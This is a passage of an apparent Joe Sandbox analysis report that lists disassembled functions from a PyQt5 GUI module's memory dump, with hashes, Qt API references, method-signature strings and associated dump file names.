Instruction ID: 12cb1fb9b8c4653ba150fb1b4ea491d51c6e5b42401ad35fbd82842888845fb7
Opcode Fuzzy Hash: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
Instruction Fuzzy Hash: B3316EB2B18A46C2FB50CB25E8586A933A9FB89B84F614176DE4D43320DF3CD489CB40

Function 00007FFB9A359B40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Part of subcall function 00007FFB9A3F9D18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB9A3F9D48

?getAxes@QQuaternion@@QEBAXPEAVQVector3D@@00@Z.QT5GUI ref: 00007FFB9A359BE5

Strings

QQuaternion, xrefs: 00007FFB9A359C60
(NNN), xrefs: 00007FFB9A359BF2
getAxes, xrefs: 00007FFB9A359C59
getAxes(self) -> (Optional[QVector3D], Optional[QVector3D], Optional[QVector3D]), xrefs: 00007FFB9A359C4A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?getAxes@Concurrency::cancel_current_taskD@@00@Quaternion@@Vector3malloc
String ID: (NNN)$QQuaternion$getAxes$getAxes(self) -> (Optional[QVector3D], Optional[QVector3D], Optional[QVector3D])
API String ID: 1332125169-3847367654
Opcode ID: d340866888418d936c102def5efeb2b852600f29cc4bc5e665ae2c4914922383
Instruction ID: f63fd8864a130b7a8711cdab002657bea27969d1459ca1c140600d913f79f4e2
Opcode Fuzzy Hash: d340866888418d936c102def5efeb2b852600f29cc4bc5e665ae2c4914922383
Instruction Fuzzy Hash: 7C317E72A08B85C5E7608F21E8446AD77ACFB85B84FA5807ADE8D03764CF3CE495C744

Function 00007FFB9A303BC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

?pictureFormat@QPictureIO@@SA?AVQByteArray@@AEBVQString@@@Z.QT5GUI ref: 00007FFB9A303C1E
?pictureFormat@QPictureIO@@SA?AVQByteArray@@PEAVQIODevice@@@Z.QT5GUI ref: 00007FFB9A303CA9

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

pictureFormat, xrefs: 00007FFB9A303CE2
pictureFormat(fileName: Optional[str]) -> QByteArraypictureFormat(a0: Optional[QIODevice]) -> QByteArray, xrefs: 00007FFB9A303CD6
QPictureIO, xrefs: 00007FFB9A303CE9

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?pictureArray@@ByteFormat@Picture$Device@@@String@@@malloc
String ID: QPictureIO$pictureFormat$pictureFormat(fileName: Optional[str]) -> QByteArraypictureFormat(a0: Optional[QIODevice]) -> QByteArray
API String ID: 3002846332-1618977619
Opcode ID: c80ca681df9a728a12ef453df163d8578752ae6899814c3c7b7910bf0b8f9957
Instruction ID: a9785506e9c582bdc875229a670929c49f0cb5b7903443549e4e3f8febb920e6
Opcode Fuzzy Hash: c80ca681df9a728a12ef453df163d8578752ae6899814c3c7b7910bf0b8f9957
Instruction Fuzzy Hash: 773161B571CB4682FB608B26E8446AA77A9FF89B84F544076DD4E53724DF3CE144C700

Function 00007FFB9A2D9C00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

?fixup@QIntValidator@@UEBAXAEAVQString@@@Z.QT5GUI ref: 00007FFB9A2D9CB9

Strings

QIntValidator, xrefs: 00007FFB9A2D9D31
BJ1, xrefs: 00007FFB9A2D9C64
fixup(self, input: Optional[str]) -> str, xrefs: 00007FFB9A2D9D1E
fixup, xrefs: 00007FFB9A2D9D2A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?fixup@String@@@Validator@@
String ID: BJ1$QIntValidator$fixup$fixup(self, input: Optional[str]) -> str
API String ID: 151386655-3112718248
Opcode ID: b2eae8e07a89f5dfdf30e1e623cfeeadbdadab6f6ef229ef599d7dd4df0ea57a
Instruction ID: 930696731df882a9cc64f862f4d7ca67b1a2c75bff14ea79dadf4dda261b2ea7
Opcode Fuzzy Hash: b2eae8e07a89f5dfdf30e1e623cfeeadbdadab6f6ef229ef599d7dd4df0ea57a
Instruction Fuzzy Hash: 0831347670CB8581EB609F65E8443AA77A8FB95B94F548072DE8D43B64DF7CD088D700

Function 00007FFB9A341AA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

?position@QTextBlock@@QEBAHXZ.QT5GUI ref: 00007FFB9A341B14
?position@QTextBlock@@QEBAHXZ.QT5GUI ref: 00007FFB9A341B1F
PyBool_FromLong.PYTHON3 ref: 00007FFB9A341B2D

Strings

1J9, xrefs: 00007FFB9A341AE3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?position@Block@@Text$Bool_FromLong
String ID: 1J9
API String ID: 3416477650-2407233842
Opcode ID: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
Instruction ID: 18d4f1651acb06d5b140f212c8bb37f5936a79a7f9c2fc9034fa0ba1c25a0e53
Opcode Fuzzy Hash: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
Instruction Fuzzy Hash: 982139BAB0CB4686FB619F65E8041A9B3A8FB85BA5F444075DE4D037A4DF3CE485C700

Function 00007FFB9A35D8E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

?key@QPageSize@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A35D93C
?key@QPageSize@@SA?AVQString@@W4PageSizeId@1@@Z.QT5GUI ref: 00007FFB9A35D9A4

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

key, xrefs: 00007FFB9A35D9DD
key(self) -> strkey(pageSizeId: QPageSize.PageSizeId) -> str, xrefs: 00007FFB9A35D9D1
QPageSize, xrefs: 00007FFB9A35D9E4

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Page$?key@Size@@String@@$Id@1@@Sizemalloc
String ID: QPageSize$key$key(self) -> strkey(pageSizeId: QPageSize.PageSizeId) -> str
API String ID: 4229482282-1788202132
Opcode ID: 4d6308a77aaadb67df2e0fad2cddaab0d1171c18150c8a571932d704ced0aaac
Instruction ID: 2d34047c9b58322479cd5811fab6749330fa5d32e796a3910ded96fe8de4a132
Opcode Fuzzy Hash: 4d6308a77aaadb67df2e0fad2cddaab0d1171c18150c8a571932d704ced0aaac
Instruction Fuzzy Hash: 5E3139B6B18A4682FB60CB75E8586B973A8FB85B94F5480B6CD4D07360DF7CE589C700

Function 00007FFB9A2EFBF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

APIs

?createObject@QTextDocument@@MEAAPEAVQTextObject@@AEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A2EFC8B

Strings

BJ9, xrefs: 00007FFB9A2EFC40
createObject(self, f: QTextFormat) -> Optional[QTextObject], xrefs: 00007FFB9A2EFCC0
createObject, xrefs: 00007FFB9A2EFCCC
QTextDocument, xrefs: 00007FFB9A2EFCD3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?createDocument@@Format@@@Object@Object@@
String ID: BJ9$QTextDocument$createObject$createObject(self, f: QTextFormat) -> Optional[QTextObject]
API String ID: 2112194817-3813377340
Opcode ID: 96817f6a642dea5558fca1bc51796851d6adb9a51bce56eae6e7070350b3f0b7
Instruction ID: 1d49c0afdbd59bb3ab1b8d172110c9b0b861309331e715ed3c7c9f760657daa5
Opcode Fuzzy Hash: 96817f6a642dea5558fca1bc51796851d6adb9a51bce56eae6e7070350b3f0b7
Instruction Fuzzy Hash: 87212EB6608B46C2FB60DB35E48426A77A8FB95B84F645172DE8D43B64DF3CD045C700

Function 00007FFB9A357EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A357F7B

Strings

childEvent, xrefs: 00007FFB9A357FB3
BJ8, xrefs: 00007FFB9A357F30
childEvent(self, a0: Optional[QChildEvent]), xrefs: 00007FFB9A357FA7
QRegExpValidator, xrefs: 00007FFB9A357FBA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QRegExpValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
API String ID: 59943102-4000051574
Opcode ID: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
Instruction ID: c2b0878d3a8fb3dfdbc3818eb6627e0a06236eb4869b30b0a8182053557ff4dd
Opcode Fuzzy Hash: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
Instruction Fuzzy Hash: C7215AB2A0CB46C2EB60CB65E88426A77A8FB85B84F544076DE8D03B34DF3CE049C700

Function 00007FFB9A311B10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFB9A311BAB

Strings

QWindow, xrefs: 00007FFB9A311BEA
BJ8, xrefs: 00007FFB9A311B60
resizeEvent(self, a0: Optional[QResizeEvent]), xrefs: 00007FFB9A311BD7
resizeEvent, xrefs: 00007FFB9A311BE3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QWindow$resizeEvent$resizeEvent(self, a0: Optional[QResizeEvent])
API String ID: 2314446140-3739113224
Opcode ID: 9691ed4ef9c984a6709befa6040865e0a6677ec908cc8433b33ea2dced2c2942
Instruction ID: 2e7d62e473df5fe3851b7a798e22565fc7d527af8a409ea7169543a608f515ee
Opcode Fuzzy Hash: 9691ed4ef9c984a6709befa6040865e0a6677ec908cc8433b33ea2dced2c2942
Instruction Fuzzy Hash: A52110B260CB46C2EB608B25E8842BA77A8FB95B84F548176DE8D43B74EF3CD045D700

Function 00007FFB9A34BAA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFB9A34BB3B

Strings

focusOutEvent(self, a0: Optional[QFocusEvent]), xrefs: 00007FFB9A34BB6A
focusOutEvent, xrefs: 00007FFB9A34BB76
BJ8, xrefs: 00007FFB9A34BAF0
QRasterWindow, xrefs: 00007FFB9A34BB7D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

